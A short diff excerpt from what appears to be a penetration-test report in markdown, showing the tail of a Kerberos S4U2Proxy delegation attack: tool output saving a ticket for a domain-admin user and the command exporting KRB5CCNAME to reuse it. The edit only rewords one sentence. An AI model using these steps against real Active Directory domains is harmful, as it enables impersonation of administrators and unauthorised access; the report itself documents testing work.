GasPROt/reportcybersec/report.md

 [*] 	Requesting S4U2Proxy
 [*] Saving ticket in domainadmin.ccache
 ```
 The TGT ticket issued for the domainadmin user to use only on the victim machine is saved on disk in the folder we're using at the moment.
-We need to import it on our krb5ccname variable to use it for kerberos authentication.
+We need to import it on our "KRB5CCNAME" environment variable to use it for kerberos authentication.
 ```
 export KRB5CCNAME=domainadmin.ccache
 ```